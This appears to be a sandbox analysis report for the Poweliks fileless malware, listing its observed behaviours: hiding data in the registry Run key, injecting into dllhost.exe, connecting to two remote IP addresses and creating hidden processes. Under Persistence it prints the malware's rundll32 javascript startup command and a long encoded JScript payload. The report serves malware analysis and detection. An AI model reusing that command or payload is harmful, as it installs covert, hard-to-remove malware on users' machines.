Poweliks Fileless Malware | VTI by Category
Try VMRay Analyzer
|
VTI Score
85 / 100
|
|
| VTI Database Version | 2.6 |
| VTI Rule Match Count | 14 |
| VTI Rule Type | Default (PE, ...) |
|
Anti Analysis |
|
|
|
Dynamic API usage
|
|
|
Resolve above average number of APIs.
|
||
|
|
Hide Tracks |
|
|
|
Write large data into the registry
|
|
|
Hide 61266 byte in "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run".
|
||
|
Hide 61268 byte in "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run".
|
||
|
|
Injection |
|
|
|
Write into memory of another process
|
|
|
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" modifies memory of "c:\windows\syswow64\dllhost.exe"
|
||
|
|
Modify control flow of another process
|
|
|
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" alters context of "c:\windows\syswow64\dllhost.exe"
|
||
|
|
Network |
|
|
|
Perform DNS request
|
|
|
Resolve host name "178.89.159.34".
|
||
|
Resolve host name "178.89.159.35".
|
||
|
|
Connect to remote host
|
|
|
Outgoing TCP connection to host "178.89.159.34:80".
|
||
|
Outgoing TCP connection to host "178.89.159.35:80".
|
||
|
|
Persistence |
|
|
|
Install system startup script or application
|
|
|
Add "rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")" to windows startup via registry.
|
||
|
Add "#@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA" to windows startup via registry.
|
||
|
|
Process |
|
|
|
Create process with hidden window
|
|
|
The process "C:\Windows\system32\rundll32.exe" starts with hidden window.
|
||
|
The process "C:\Windows\syswow64\dllhost.exe" starts with hidden window.
|
||
|
|
Create a page with write and execute permissions
|
|
|
Allocate a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.
|
||
| - | Browser | |
| - | Device | |
| - | OS | |
| - | File System | |
| - | Information Stealing | |
| - | Kernel | |
| - | Masquerade | |
| - | PE | |
| - | User | |
| - | VBA Macro | |
| - | YARA | |
